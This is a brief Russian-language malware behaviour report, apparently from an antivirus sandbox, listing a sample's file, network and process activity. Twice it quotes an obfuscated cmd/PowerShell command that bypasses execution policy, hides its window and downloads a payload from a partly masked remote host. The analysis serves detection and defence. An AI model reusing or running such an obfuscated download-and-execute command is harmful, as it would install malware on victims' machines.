Техническая информация
Вредоносные функции
Загружает и запускает на исполнение
- http://ne###ntech.com/wp-content/ay4te/mdp5.exe как %appdata%.exe
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /C "POWers^HeL^l.exE -^EX^eC^u^tI^o^NPoLI^CY ^by^PasS -n^o^PROFiLe -WiNdOW^sT^yLE hIDdEN^ ^(^n^e^W-^obje^Ct sySt^e^m.N^E^T.WEBc^L^IE^n^t).^doW^nLo^a^D^F^ILe('http://ne###ntech.com/wp...
Изменения в файловой системе
Создает следующие файлы
- %APPDATA%.exe
Сетевая активность
Подключается к
- 'ht##.#odhosting.net':80
UDP
- DNS ASK ne###ntech.com
- DNS ASK ht##.#odhosting.net
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /C "POWers^HeL^l.exE -^EX^eC^u^tI^o^NPoLI^CY ^by^PasS -n^o^PROFiLe -WiNdOW^sT^yLE hIDdEN^ ^(^n^e^W-^obje^Ct sySt^e^m.N^E^T.WEBc^L^IE^n^t).^doW^nLo^a^D^F^ILe('http://ne###ntech.com/wp...' (со скрытым окном)
